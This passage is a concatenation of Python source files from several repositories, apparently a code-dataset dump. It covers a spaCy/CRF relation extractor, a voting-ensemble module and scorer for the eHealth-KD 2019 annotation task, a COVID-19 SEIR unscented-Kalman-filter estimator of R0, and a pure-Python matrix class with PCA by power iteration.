is_stop=word.is_stop,
is_left_punct=word.is_left_punct,
is_right_punct=word.is_right_punct,
like_url=word.like_url,
like_num=word.like_num,
like_email=word.like_email,
)
tags = word.tag_
try:
_, tags = tags.split("__")
for tag in tags.split("|"):
k, v = tag.split("=")
features[k] = v
except:
pass
return features
def train_entities(self, sentences, classes):
logger.info("Preparing training set")
X_training_set = []
y_training_set = classes
for i, sentence in enumerate(sentences):
doc, xs = self.feature_sentence(sentence)
X_training_set.append(xs)
if self.callback:
self.callback(
msg="Processing sentence", current=i, total=len(sentences)
)
logger.info(f"Training in {len(X_training_set)} examples")
# Train classifier
classifier = CRF()
classifier.fit(X_training_set, y_training_set)
self.classes = set(sum(y_training_set, []))
self.classifier = classifier
def predict_relation_single(self, doc, sentence):
# predecir la relación más probable para cada par de palabras
for k1 in sentence.keyphrases:
for k2 in sentence.keyphrases:
if k1 == k2:
continue
# k1 y k2 son Keyphrases, convertir a features
features = self.relation_features(None, k1, k2, doc)
if features is None:
continue
relation_label = self.relation_classifier.predict([features])[0]
if not relation_label:
continue
relation = Relation(sentence, k1.id, k2.id, relation_label)
probs = self.relation_classifier.predict_proba([features])[0]
relation.uncertainty = scipy.stats.entropy(list(probs), base=2)
sentence.relations.append(relation)
def predict_relations(self, collection: Collection):
nlp = spacy_model("es")
for sentence in collection.sentences:
doc = nlp(sentence.text)
self.predict_relation_single(doc, sentence)
return collection
def relation_features(
self,
relation: Relation = None,
keyphrase_from: Keyphrase = None,
keyphrase_to: Keyphrase = None,
doc=None,
):
if relation is not None:
keyphrase_from = relation.from_phrase
keyphrase_to = relation.to_phrase
if doc is None:
doc = spacy_model("es")(keyphrase_from.sentence.text)
doc_from = [
token
for token in doc
if token.idx >= keyphrase_from.spans[0][0]
and token.idx <= keyphrase_from.spans[-1][0]
]
doc_to = [
token
for token in doc
if token.idx >= keyphrase_to.spans[0][0]
and token.idx <= keyphrase_to.spans[-1][0]
]
if not doc_from or not doc_to:
return None
from_features = {
"from_%s" % k: v for k, v in self.word_features(doc_from[0]).items()
}
to_features = {"to_%s" % k: v for k, v in self.word_features(doc_to[0]).items()}
lcp = doc_from[0]
while not lcp.is_ancestor(doc_to[0]):
lcp = lcp.head
if lcp == lcp.head:
break
inner_text = [
token.lemma_ for token in lcp.subtree if token not in doc_to + doc_from
]
d = dict(
from_features,
**to_features,
from_type=keyphrase_from.label,
to_type=keyphrase_to.label,
)
for w in inner_text:
d[f"inner({w})"] = True
return d
def train_relations(self, collection: Collection):
X_training = []
y_training = []
nlp = spacy_model("es")
for i, sentence in enumerate(collection.sentences):
doc = nlp(sentence.text)
for relation in sentence.relations:
X_training.append(self.relation_features(relation, doc=doc))
if X_training[-1] is None:
del X_training[-1]
continue
y_training.append(relation.label)
for k1 in sentence.keyphrases:
for k2 in sentence.keyphrases:
if k1 == k2:
continue
if (
not sentence.find_relations(k1, k2)
and random.uniform(0, 1) < self.negative_sampling
):
X_training.append(self.relation_features(None, k1, k2, doc))
if X_training[-1] is None:
del X_training[-1]
continue
y_training.append("")
if self.callback:
self.callback(
msg="Processing sentence",
current=i,
total=len(collection.sentences),
)
relation_classifier = make_pipeline(
DictVectorizer(), LogisticRegression(max_iter=1000)
)
relation_classifier.fit(X_training, y_training)
self.relation_classifier = relation_classifier
if __name__ == "__main__":
fire.Fire()
```
#### File: ensemble-baseline/scripts/stats.py
```python
from collections import defaultdict
from pathlib import Path
from scripts.agreement import load_corpus
from scripts.utils import Collection, CollectionV1Handler, CollectionV2Handler
def count_labels_on(corpus: Collection):
counter = defaultdict(int)
for sentence in corpus.sentences:
for kp in sentence.keyphrases:
counter[kp.label] += 1
for attr in kp.attributes:
counter[attr.label] += 1
for rel in sentence.relations:
counter[rel.label] += 1
return counter
def count_labels(path: Path, handler=None):
corpus = handler.load_dir(Collection(), path) if handler else load_corpus(path)
return count_labels_on(corpus)
def count_labels_based_on(path: Path, reference: Path):
collection = load_corpus(path)
reference = CollectionV1Handler.load_dir(Collection(), reference)
sentences = []
for ref_sent in reference.sentences:
for sent in collection.sentences:
if sent.text == ref_sent.text:
sentences.append(sent)
break
print(len(collection))
print(len(reference))
print(len(sentences))
return count_labels_on(Collection(sentences))
def count_complex_entities(path: Path):
count = 0
visited = set()
corpus = load_corpus(path)
for sentence in corpus.sentences:
for relation in sentence.relations:
if (
relation.from_phrase.id not in visited
and relation.label in ["subject", "target"]
and relation.to_phrase.label in ["Action", "Predicate"]
):
visited.add(relation.from_phrase.id)
count += 1
return count
def main():
# print(count_complex_entities(Path("./data/v1/medline/phase3-review")))
# print(count_labels(Path("./data/v1/medline/")))
# print(
# count_labels_based_on(
# Path("./data/v1/medline/phase3-review"),
# Path("./data/v1/ehealth19/testing/scenario3-taskB/"),
# )
# )
pass
if __name__ == "__main__":
main()
``` |
{
"source": "jpconsuegra/ensemble-kd2019",
"score": 2
} |
#### File: scripts/ensemble/ensemblers.py
```python
from collections import defaultdict
from typing import Dict, List, Optional
from scripts.ensemble import EnsembleChoir, EnsembledCollection, Ensembler
from scripts.utils import ENTITIES, RELATIONS, Collection
# =======================================================================
# - VotingEnsembler -----------------------------------------------------
# =======================================================================
class VotingEnsembler(Ensembler):
def _do_ensemble(self, to_ensemble: EnsembledCollection):
self._ensemble_annotations(to_ensemble.keyphrase_votes())
self._ensemble_annotations(to_ensemble.relation_votes())
def _ensemble_annotations(self, annotation_votes):
for sid, ann, votes_per_label in annotation_votes:
self._assign_label(ann, sid, votes_per_label)
def _assign_label(self, annotation, sid: int, votes_per_label: dict):
metrics = self._compute_metrics(annotation, sid, votes_per_label)
annotation.label = self._select_label(annotation, sid, metrics)
def _compute_metrics(self, annotation, sid: int, votes_per_label: dict) -> dict:
metrics = {}
for label, votes in votes_per_label.items():
metrics[label] = self._score_label(annotation, sid, label, votes)
return metrics
def _score_label(self, annotation, sid: int, label: str, votes: dict) -> float:
raise NotImplementedError()
def _select_label(self, annotation, sid: int, metrics: dict) -> str:
if not metrics:
return None
label = self._best_label(metrics)
return self._validate_label(annotation, sid, label, metrics[label])
def _best_label(self, metrics: dict) -> str:
return max(metrics, key=lambda x: metrics[x])
def _validate_label(
self, annotation, sid: int, label: str, score: float
) -> Optional[str]:
raise NotImplementedError()
class ManualVotingEnsembler(VotingEnsembler):
def __init__(self, choir, orchestrator, weighter, scorer, validator):
super().__init__(choir, orchestrator)
self._weighter = weighter
self._scorer = scorer
self._validator = validator
@property
def weight(self):
return self._weighter
@property
def score(self):
return self._scorer
@property
def validate(self):
return self._validator
def _score_label(self, annotation, sid: int, label: str, votes: dict) -> float:
weights = {submit: self.weight(label, sid, submit) for submit in votes}
return self.score(weights, annotation, sid, label)
def _validate_label(
self, annotation, sid: int, label: str, score: float
) -> Optional[str]:
return self.validate(annotation, sid, label, score)
# =======================================================================
# - Weighter ------------------------------------------------------------
# =======================================================================
class Weighter:
def __call__(self, label: str, sid: int, submit: str) -> float:
raise NotImplementedError()
class TableWeighter(Weighter):
def __init__(self, table={}):
self.table = table
def __call__(self, label: str, sid: int, submit: str) -> float:
return self.table[submit, label]
class UniformWeighter(TableWeighter):
@classmethod
def build(cls):
return cls(table=defaultdict(lambda: 1))
class F1Weighter(TableWeighter):
@classmethod
def build(cls, choir: EnsembleChoir, *, entities=ENTITIES, relations=RELATIONS):
table = defaultdict(int)
for label in ENTITIES + RELATIONS:
for name, submit in choir.submissions.items():
table[name, label] = cls._score(
choir,
submit,
label,
skipA=label not in entities, # I know :P
skipB=label not in relations,
)
return cls(table=table)
@classmethod
def _score(
cls,
choir: EnsembleChoir,
submit: Collection,
label: str,
skipA: bool,
skipB: bool,
):
submit_selection = submit.filter(
keyphrase=lambda k: (True if skipA else k.label == label),
relation=lambda r: r.label == label,
)
gold_selection = choir.gold.filter(
keyphrase=lambda k: (True if skipA else k.label == label),
relation=lambda r: r.label == label,
)
score = choir.evaluate_scenario(submit_selection, gold_selection, skipA, skipB)
return score["f1"]
# =======================================================================
# - Scorer --------------------------------------------------------------
# =======================================================================
class Scorer:
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
raise NotImplementedError()
class AverageScorer(Scorer):
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
return sum(weights.values()) / len(weights)
class SumScorer(Scorer):
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
return sum(weights.values())
class MaxScorer(Scorer):
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
return max(weights.values())
class TopScorer(Scorer):
def __init__(self, k, merge):
self._k = k
self._merge = merge
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
top = sorted(weights.values(), reverse=True)[: self._k]
return self._merge(top) if top else 0.0
class AverageTopScorer(TopScorer):
def __init__(self, k: int, strict: bool):
merge = lambda top: sum(top) / (k if strict else len(top))
super().__init__(k, merge)
class AggregateTopScorer(TopScorer):
def __init__(self, k: int):
merge = lambda top: sum(top)
super().__init__(k, merge)
class ExpertScorer(Scorer):
def __init__(self, weighter, choir: EnsembleChoir, discrete: bool):
super().__init__()
self._weighter = weighter
self._choir = choir
self._discrete = discrete
@property
def weight(self):
return self._weighter
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
best = max(
self.weight(label, sid, submit) for submit in self._choir.submissions
)
return (
(1.0 if self._discrete else best)
if any(x for x in weights.values() if x >= best)
else 0.0
)
class GoldOracleScorer(Scorer):
def __init__(self, choir: EnsembleChoir):
super().__init__()
self._choir = choir
def __call__(
self, weights: Dict[str, float], annotation, sid: int, label: str
) -> float:
return float(
self._everyone_voted(weights)
or self._found_in_gold_and_at_least_one_voted(annotation, sid, label)
)
def _everyone_voted(self, weights):
return len(weights) == len(self._choir.submissions)
def _found_in_gold_and_at_least_one_voted(self, annotation, sid: int, label: str):
gold_sentence = self._choir.gold.sentences[sid]
gold_annotation = gold_sentence.find_first_match(annotation, label)
return gold_annotation is not None
class FocusedScorer(Scorer):
def __init__(self, name: str, discrete: bool):
self._name = name
self._discrete = discrete
def __call__(self, weights: Dict[str, float], annotation, sid, label):
try:
weight = weights[self._name]
return 1.0 if self._discrete else weight
except KeyError:
return 0.0
class YesToAllScorer(Scorer):
def __call__(self, weights: Dict[str, float], annotation, sid, label):
return 1.0
# =======================================================================
# - Validator -----------------------------------------------------------
# =======================================================================
class Validator:
def __call__(self, annotation, sid: int, label: str, score: float) -> Optional[str]:
raise NotImplementedError()
class NonZeroValidator(Validator):
def __call__(self, annotation, sid: int, label: str, score: float) -> Optional[str]:
return label if score else None
class ThresholdValidator(Validator):
def __init__(self, thresholds: Dict[str, float]):
super().__init__()
self._thresholds = thresholds
def __call__(self, annotation, sid: int, label: str, score: float) -> Optional[str]:
return label if score > self._thresholds[label] else None
class ConstantThresholdValidator(ThresholdValidator):
def __init__(self, threshold=0.5):
super().__init__(thresholds=defaultdict(lambda: threshold))
class MajorityValidator(ConstantThresholdValidator):
def __init__(self, n_submits):
super().__init__(threshold=n_submits // 2)
```
#### File: scripts/ensemble/features.py
```python
from collections import defaultdict
from typing import Any, Dict, List, Literal, Tuple
import numpy as np
from scripts.utils import ENTITIES, RELATIONS
class FeatureBuilder:
def __call__(self, raw_features):
raise NotImplementedError()
class VotingFeatures(FeatureBuilder):
def __init__(self, voters, weighter=None):
self._voters = voters
self._weighter = weighter or (lambda x, y: 1)
def __call__(self, votes_for_label):
votes, label = votes_for_label
n_votes = len(self._voters)
features = np.zeros(n_votes)
select_votes = zip(
*[
(i, self._weighter(submit, label))
for i, submit in enumerate(self._voters)
if submit in votes
]
)
try:
voted, weights = select_votes
except ValueError:
voted, weights = [], []
voted = list(voted)
weights = list(weights)
features[voted] = weights
return features
class LabelFeatures(FeatureBuilder):
def __init__(self, labels):
self._label2index = {label: i for i, label in enumerate(labels)}
def __call__(self, label):
features = np.zeros(len(self._label2index))
index = self._label2index[label]
features[index] = 1
return features
class WithHandler(FeatureBuilder):
def __init__(self, builder: FeatureBuilder, handler):
self._builder = builder
self._handler = handler
def __call__(self, raw_features):
return self._builder(self._handler(raw_features))
class ConcatenatedFeatures(FeatureBuilder):
def __init__(self, *builders_and_handlers):
self._builders = [
WithHandler(builder=b, handler=h) for b, h in builders_and_handlers
]
def __call__(self, raw_features):
return np.concatenate([builder(raw_features) for builder in self._builders])
class ModelHandler:
def __call__(
self, annotation_votes, selected_sids=None
) -> Dict[str, Tuple[Any, List[int], List[Any], List[str], np.ndarray]]:
pass
class PerCategoryModel(ModelHandler):
def __init__(
self,
*,
voters,
labels_per_category: Dict[str, list],
model_init,
weighter=None,
):
self._builders = {
category: self._get_builder_according_to_labels(labels, voters, weighter)
for category, labels in labels_per_category.items()
}
self._models = {category: model_init() for category in labels_per_category}
self._label2category = {
label: category
for category, labels in labels_per_category.items()
for label in labels
}
assert sum(len(x) for x in labels_per_category.values()) == len(
self._label2category
)
@classmethod
def _get_builder_according_to_labels(cls, labels, voters, weighter):
if len(labels) > 1:
return ConcatenatedFeatures(
(LabelFeatures(labels), cls._get_label),
(VotingFeatures(voters, weighter), cls._get_votes),
)
else:
return WithHandler(VotingFeatures(voters, weighter), cls._get_votes)
@classmethod
def _get_label(cls, item):
label, _ = item
return label
@classmethod
def _get_votes(cls, item):
label, votes = item
return votes, label
def __call__(self, annotation_votes, selected_sids=None):
per_category = defaultdict(lambda: ([], [], [], []))
for sid, ann, votes_per_label in annotation_votes:
if selected_sids is None or sid in selected_sids:
# TODO: en el caso no binario estoy no hace lo esperado
for label, votes in votes_per_label.items():
if label not in self._label2category:
print(f"Ignoring {ann} with label {label}.")
continue
category = self._label2category[label]
builder = self._builders[category]
sids, anns, labels, features = per_category[category]
features.append(builder((label, votes)))
sids.append(sid)
anns.append(ann)
labels.append(label)
return {
category: (self._models[category], sids, anns, labels, np.asarray(features))
for category, (sids, anns, labels, features) in per_category.items()
}
class AllInOneModel(PerCategoryModel):
def __init__(self, *, voters, labels, model_init, weighter=None):
super().__init__(
voters=voters,
labels_per_category={"all": labels},
model_init=model_init,
weighter=weighter,
)
class PerLabelModel(PerCategoryModel):
def __init__(self, *, voters, labels, model_init, weighter=None):
super().__init__(
voters=voters,
labels_per_category={l: [l] for l in labels},
model_init=model_init,
weighter=weighter,
)
def model_handler_assistant(
*,
voters,
model_init,
labels=ENTITIES + RELATIONS,
mode: Literal["category", "all", "each"],
weighting_table: Dict[Tuple[str, str], float] = None,
):
weighter = (
(lambda submit, label: weighting_table[submit, label])
if weighting_table is not None
else None
)
if mode == "category":
labels_per_category = defaultdict(list)
for label in labels:
if label in ENTITIES:
labels_per_category["ENTITIES"].append(label)
elif label in RELATIONS:
labels_per_category["RELATIONS"].append(label)
else:
raise Exception("Unknown category!")
return lambda: PerCategoryModel(
voters=voters,
labels_per_category=labels_per_category,
model_init=model_init,
weighter=weighter,
)
elif mode == "all":
return lambda: AllInOneModel(
voters=voters, labels=labels, model_init=model_init, weighter=weighter
)
elif mode == "each":
return lambda: PerLabelModel(
voters=voters, labels=labels, model_init=model_init, weighter=weighter
)
else:
raise ValueError("Unknown mode: {mode}")
```
#### File: ensemble-kd2019/scripts/evaltest.py
```python
import collections
import argparse
import pprint
import json
from pathlib import Path
from .score import subtaskA, subtaskB, compute_metrics
from .utils import Collection
def evaluate_scenario(submit, gold, scenario):
submit_input = submit / ("output_scenario%i.txt" % scenario)
if not submit_input.exists():
submit_input = submit / ("input_scenario%i.txt" % scenario)
if not submit_input.exists():
raise ValueError("Input file not found in '%s'" % submit)
submit = Collection().load(submit_input)
resultA = subtaskA(gold, submit)
resultB = subtaskB(gold, submit, resultA)
results = {}
for k,v in list(resultA.items()) + list(resultB.items()):
results[k] = len(v)
metrics = compute_metrics(dict(resultA, **resultB), skipA=scenario==3, skipB=scenario==2)
results.update(metrics)
return results
def evaluate_one(submit: Path, scenario1_gold, scenario2_gold, scenario3_gold):
scenario1_submit = submit / "scenario1-main"
scenario2_submit = submit / "scenario2-taskA"
scenario3_submit = submit / "scenario3-taskB"
scenario1 = dict(evaluate_scenario(scenario1_submit, scenario1_gold, 1), submit=submit.name)
scenario2 = dict(evaluate_scenario(scenario2_submit, scenario2_gold, 2), submit=submit.name)
scenario3 = dict(evaluate_scenario(scenario3_submit, scenario3_gold, 3), submit=submit.name)
return dict(submit=submit.name,
scenario1=scenario1,
scenario2=scenario2,
scenario3=scenario3)
def main(submits:Path, gold:Path, best=False, single=False, csv=False, pretty=False, final=False):
users = collections.defaultdict(list)
if csv and not best:
raise ValueError("Error: --csv implies --best")
if final and (not csv or not best):
raise ValueError("Error: --final implies --csv and --best")
scenario1_gold = Collection().load(gold / "scenario1-main" / "input_scenario1.txt")
scenario2_gold = Collection().load(gold / "scenario2-taskA" / "input_scenario2.txt")
scenario3_gold = Collection().load(gold / "scenario3-taskB" / "input_scenario3.txt")
if single:
for subfolder in submits.iterdir():
users[submits.name].append(evaluate_one(subfolder, scenario1_gold, scenario2_gold, scenario3_gold))
else:
for userfolder in submits.iterdir():
for subfolder in userfolder.iterdir():
users[userfolder.name].append(evaluate_one(subfolder, scenario1_gold, scenario2_gold, scenario3_gold))
results = dict(users)
if best:
results = filter_best(results)
if csv:
import pandas as pd
items = []
for user, data in results.items():
userdata = dict(name=user)
for k, metrics in data.items():
userdata.update({"%s-%s"%(k,m):v for m,v in metrics.items()})
items.append(userdata)
df = pd.DataFrame(items)
df = df.set_index('name').sort_index().transpose()
if final:
df1 = df.transpose()[['scenario1-f1', 'scenario1-precision', 'scenario1-recall']]
df1 = df1.sort_values('scenario1-f1', ascending=False).to_csv()
df2 = df.transpose()[['scenario2-f1', 'scenario2-precision', 'scenario2-recall']]
df2 = df2.sort_values('scenario2-f1', ascending=False).to_csv()
df3 = df.transpose()[['scenario3-f1', 'scenario3-precision', 'scenario3-recall']]
df3 = df3.sort_values('scenario3-f1', ascending=False).to_csv()
print(df1)
print(df2)
print(df3)
elif pretty:
print(df.to_html())
else:
print(df.to_csv())
else:
print(json.dumps(results, sort_keys=True, indent=2 if pretty else None))
def filter_best(results):
best = {}
for user, submits in results.items():
scenario1 = [entry['scenario1'] for entry in submits]
scenario2 = [entry['scenario2'] for entry in submits]
scenario3 = [entry['scenario3'] for entry in submits]
best1 = max(scenario1, key=lambda d:d['f1'])
best2 = max(scenario2, key=lambda d:d['f1'])
best3 = max(scenario3, key=lambda d:d['f1'])
best[user] = dict(scenario1=best1, scenario2=best2, scenario3=best3)
return best
if __name__ == "__main__":
parser = argparse.ArgumentParser("evaltest")
parser.add_argument("submits", help="Path to the submissions folder. This is the folder of all participants, or, if --single is passed, directly the folder of one participant. Each participant's folder contains subfolders with submissions.")
parser.add_argument("gold", help="Path to the gold folder, e.g. './data/testing.'")
parser.add_argument("--best", action='store_true', help="Report only the best submission per scenario, otherwise all submissions are reported.")
parser.add_argument("--single", action='store_true', help="If passed, then submits points to a single participant folder with submission folders inside, otherwise submits points to a folder with many participants, each with submission folders inside.")
parser.add_argument("--csv", action='store_true', help="If passed then results are formatted as a table, can only be used with --best. Otherwise, results are returned in JSON format.")
parser.add_argument("--pretty", action='store_true', help="If passed results are pretty printed: indented in JSON or in HTML when using --csv.")
parser.add_argument("--final", action='store_true', help="If passed, results are formatted for final publication. Can only be passed with --csv and --best.")
args = parser.parse_args()
main(Path(args.submits), Path(args.gold), args.best, args.single, args.csv, args.pretty, args.final)
``` |
{
"source": "jpcorb20/covid19-transmission-ukf",
"score": 3
} |
#### File: jpcorb20/covid19-transmission-ukf/calculatate_transmission.py
```python
import numpy as np
import pandas as pd
from filterpy.kalman import UnscentedKalmanFilter, MerweScaledSigmaPoints
from filterpy.common import Q_discrete_white_noise
import matplotlib.pyplot as plt
def smooth(y, box_pts):
"""
Smoothing function.
:param y: np.array.
:param box_pts: window (int).
:return: smoother np.array.
"""
box = np.ones(box_pts)/box_pts
y_smooth = np.convolve(y, box, mode='same')
return y_smooth
def preprocess_data(data_country):
"""
Compute I and R from cumulative Cases, Recovered and Deaths data.
:param data_country: fetched data like John Hopkins Covid-19 (pd.DataFrame).
:return: list of tuple daily (I, R).
"""
global DATA_SMOOTHING_WINDOW, CASES_CONSIDERED
return [(c - (r + d), r + d) for c, d, r
in zip(data_country['Cases'].rolling(DATA_SMOOTHING_WINDOW).mean(),
data_country['Dead'].rolling(DATA_SMOOTHING_WINDOW).mean(),
data_country['Recovered'].rolling(DATA_SMOOTHING_WINDOW).mean())
if c > CASES_CONSIDERED]
def fx(x, delta_t):
"""
Equations from the SEIR model.
dS = - (R0 / T_inf) * (S / N) * I * dt
dE = ((R0 / T_inf) * (S / N) * I - E / T_inc) * dt
dI = (E / T_inc - beta * I) * dt
dR = beta * I * dt
dR0[t] = ddR0[t-1] * dt
ddR0[t] ~ N(0, q ** 2)
:param x: t-1 state vector.
:param delta_t: time delta.
:return: state vector at t.
"""
global t_inc, t_inf, N
S = x[0]
E = x[2] if x[2] >= 0 else 0
I = x[4]
R0 = x[8] if x[8] >= 0 else 0
dS_temp = (R0 / t_inf) * (S / N) * I * delta_t
dE_temp = (E / t_inc) * delta_t
dS = - dS_temp
dE = dS_temp - dE_temp
dR = (I / t_inf) * delta_t
dI = dE_temp - dR
dR0 = x[9] * delta_t
ddR0 = x[10] * delta_t
x[1] = dS
x[3] = dE
x[5] = dI
x[7] = dR
x[9] = ddR0
return x + np.array([dS, 0, dE, 0, dI, 0, dR if dR > 0 else 0, 0, dR0, ddR0, 0, 0], dtype=float)
def hx(x):
"""
Measurement from state vector.
:param x: state vector.
:return: measured vector.
"""
return np.array([x[4], x[6]])
# My data is using french country names.
POPULATIONS = {
"Canada": 37.7e6,
# "Québec": 8.4e6,
# "Portugal": 10.2e6,
# "France": 65.2e6,
"Italie": 60.5e6,
# "Espagne": 46.8e6,
# "Allemagne": 88e6,
# "États-Unis": 330e6
}
CASES_CONSIDERED = 30
DATA_SMOOTHING_WINDOW = 1
FORECAST_DAYS = 5
AVERAGE_R0_WINDOW = 7
SIGMA_CONSIDERED = 3
# From literature:
# - https://wwwnc.cdc.gov/eid/article/26/7/20-0282_article.
# - https://www.ncbi.nlm.nih.gov/pubmed/32097725.
# - https://gabgoh.github.io/COVID/index.html.
t_inf = 2.9
t_inc = 5.2
R0_init = 5.7 # Not very sensible to current or previous estimate of R0.
# Unscented Kalman Filter (UKF) setup.
dt = 1
dim_x, dim_z = 12, 2
z_std = (1e-2, 5e-3)
var_q = 5e-2
points = MerweScaledSigmaPoints(dim_x, alpha=1e-3, beta=2, kappa=1)
if __name__ == '__main__':
data = pd.read_excel("data.xlsx", index_col=0)
# Run UKF by populations.
results = list()
predicts = list()
for k, v in POPULATIONS.items():
print(k)
N = v
data_country = data[data["country"] == k]
zs = preprocess_data(data_country)
# SETUP UKF.
kf = UnscentedKalmanFilter(dim_x=dim_x, dim_z=dim_z, dt=dt, fx=fx, hx=hx, points=points)
# ~ Inital conditions.
kf.x = np.array([v, 0,
0, 0,
zs[0][0], 0,
zs[0][1], 0,
R0_init, 0, 0, 0])
# Noise setup
kf.P *= 1e0 # factor on uncertainty of initial condition.
kf.R = np.diag([z ** 2 for z in list(z_std)])
kf.Q = Q_discrete_white_noise(dim=dim_z, dt=dt, var=var_q ** 2, block_size=int(dim_x / 2))
# RUN UKF
# Derive all hidden variables from past and present.
R = list()
R0 = list()
for z in zs:
kf.predict()
kf.update(z)
x, y = kf.x, kf.P
R0.append(x[8])
R.append((x, y))
# Predict future.
for i in range(FORECAST_DAYS):
# Keep R0 constant for predictions.
kf.x[8] = np.mean(R0[-AVERAGE_R0_WINDOW:])
kf.x[9] = 0
kf.x[10] = 0
try:
kf.predict()
x, y = kf.x, kf.P
R.append((x, y))
except np.linalg.LinAlgError:
print("Cannot predict %d" % i)
results.append(R)
# Plot population curves I, E and R.
for r, t in zip(results, POPULATIONS.keys()):
xs = range(len(r))
I = smooth([a[0][4] for a in r], DATA_SMOOTHING_WINDOW)
sI = [SIGMA_CONSIDERED * np.sqrt(a[1][4, 4]) for a in r]
R = smooth([a[0][6] for a in r], DATA_SMOOTHING_WINDOW)
sR = [SIGMA_CONSIDERED * np.sqrt(a[1][6, 6]) for a in r]
# E = smooth([a[0][2] for a in r], DATA_SMOOTHING_WINDOW)
# sE = [SIGMA_CONSIDERED * np.sqrt(a[1][2, 2]) for a in r]
plt.errorbar(x=xs, y=I, yerr=sI)
plt.errorbar(x=xs, y=R, yerr=sR)
# plt.errorbar(x=xs, y=E, yerr=sE)
plt.title(t)
plt.xlabel("Days from 30 first cases")
plt.ylabel("Persons")
plt.legend(["Infected", "Recovered", "Exposed"])
plt.grid(True)
plt.show()
# Plot R0.
for r, t in zip(results, POPULATIONS.keys()):
xs = range(len(r))
R0 = smooth([a[0][8] for a in r], DATA_SMOOTHING_WINDOW)
sR0 = [SIGMA_CONSIDERED * np.sqrt(a[1][8, 8]) for a in r]
plt.errorbar(x=xs, y=R0, yerr=sR0)
plt.legend(POPULATIONS.keys())
plt.xlabel("Days from 30 first cases")
plt.ylabel("R naught")
plt.grid(True)
plt.show()
``` |
{
"source": "jpcorb20/pure-matrix",
"score": 4
} |
#### File: jpcorb20/pure-matrix/matrix.py
```python
from random import random
from math import sqrt
from typing import List
class Matrix:
def __init__(self, lists: List[List[float]]):
lengths = list(map(lambda x: len(x), lists))
assert all([i == lengths[0] for i in lengths]), "All lists are not of same length."
self._lists = lists
self.shape = (len(lists), lengths[0])
def __str__(self):
return str(self.get_list())
def __iter__(self):
return iter(self._lists)
def get_shape(self):
return self.shape
def get_list(self):
return self._lists
def get_element(self, i: int, j: int):
assert i < self.shape[0] and j < self.shape[1], "Coordinates does not exist."
return self._lists[i][j]
def slice(self, i: tuple=None, j: tuple=None):
if i is None:
i = (0, self.shape[0])
if j is None:
j = (0, self.shape[1])
assert len(i) == 2 and len(j) == 2 and min(i) >= 0 and min(j) >= 0 and \
max(i) <= self.shape[0] and max(j) <= self.shape[1], "Coordinates does not exist."
return Matrix([[self._lists[I][J] for J in list(range(*j))] for I in list(range(*i))])
def get_flatten_list(self):
return [j for i in self._lists for j in i]
def transpose(self):
return Matrix([[self._lists[i][j] for i in range(self.shape[0])] for j in range(self.shape[1])])
def sum(self, axis: int=-1):
assert axis in [-1, 0, 1], "Not a valid axis."
if axis == 0:
return Matrix([[sum(i)] for i in self._lists])
elif axis == 1:
return Matrix([[sum(i) for i in self.transpose()]])
elif axis == -1:
return sum([sum(i) for i in self._lists])
def mean(self, axis: int=-1):
assert axis in [-1, 0, 1], "Not a valid axis."
if axis == 0 or axis == 1:
return self.sum(axis=axis).scalar_product(1/float(self.shape[1-axis]))
elif axis == -1:
return self.sum(axis=-1) / (self.shape[0] * self.shape[1])
def scalar_product(self, a: float):
return Matrix([[a * j for j in i] for i in self._lists])
def element_sum(self, a):
assert self.shape == a.shape
return Matrix([
[j + q for j, q in zip(i, p)]
for i, p in zip(self._lists, a.get_list())
])
def element_substract(self, a):
assert self.shape == a.shape
return Matrix([
[j - q for j, q in zip(i, p)]
for i, p in zip(self._lists, a.get_list())
])
def element_product(self, a):
assert self.shape == a.shape
return Matrix([
[j * q for j, q in zip(i, p)]
for i, p in zip(self._lists, a.get_list())
])
def element_exponent(self, power: int=2):
return Matrix([[j ** power for j in i] for i in self._lists])
def element_divide(self, a):
assert self.shape == a.shape
assert all([j != 0 for i in a.get_list() for j in i]), "At least one element is zero."
return Matrix([
[j / q for j, q in zip(i, p)]
for i, p in zip(self._lists, a.get_list())
])
def column(self, j):
assert j < self.shape[1], "Not enought columns"
return Matrix([[self._lists[i][j]] for i in range(self.shape[0])])
def row(self, i):
assert i < self.shape[0], "Not enought rows"
return Matrix([[self._lists[i][j] for j in range(self.shape[1])]])
def mat_product(self, a):
assert self.shape[1] == a.get_shape()[0]
return Matrix([
[self.row(i).element_product(a.column(j).transpose()).sum()
for j in range(a.get_shape()[1])
] for i in range(self.shape[0])
])
def is_square(self):
return self.shape[0] == self.shape[1]
def repeat_vector(self, n: int):
s = self.get_shape()
assert (s[0] != 1 or s[1] != 1), "One dimension must be 1 for vector."
if s[0] == 1:
return Matrix([self.get_list()[0] for _ in range(n)])
elif s[1] == 1:
return Matrix([[i[0] for _ in range(n)] for i in self.get_list()])
def standardize(self, axis: int=1):
assert axis in [0, 1], "Not a valid axis."
return self.element_substract(self.mean(axis=axis).repeat_vector(n=self.shape[1 - axis]))
def corr(self):
centered = self.standardize()
return centered.transpose().mat_product(centered)
class PCA:
def __init__(self, n_components: int=2):
self.n_components = n_components
self.val, self.vecs = None, None
def naive_power_iteration(self, A: Matrix, verbose: bool = False, tol: float = 1e-6, n_iter: int = 100):
assert A.is_square(), "A is not square"
n = A.get_shape()[0]
b_v = list()
b_vec = list()
for _ in range(n):
b_v_temp = None
b_v_new = 0
b = Matrix([[sqrt(1 / n)] for _ in range(n)])
for i in range(n_iter):
new_b = A.mat_product(b)
b = new_b.element_divide(Matrix([[sqrt(new_b.element_exponent(2).sum())] for _ in range(n)]))
b_v_new = b.transpose().mat_product(A.mat_product(b)).get_element(0, 0)
if len(b_v) > 0 and b_v_temp is not None and abs(b_v_new - b_v_temp) < tol:
if verbose:
print("break at step %d" % i)
break
b_v_temp = b_v_new
b_v.append(b_v_new)
b_vec.append(b.transpose().get_list()[0])
A = A.element_substract(b.mat_product(b.transpose()).scalar_product(b_v_temp))
self.val, self.vecs = b_v, Matrix(b_vec)
def fit(self, mat: Matrix):
self.naive_power_iteration(mat.corr(), verbose=True)
def transform(self, mat: Matrix):
assert self.val is not None and self.vecs is not None, "Not fitted"
return mat.standardize().mat_product(self.vecs.slice(i=(0, self.n_components)).transpose())
def fit_transform(self, mat: Matrix):
self.fit(mat)
return self.transform(mat)
def argmin(iterable):
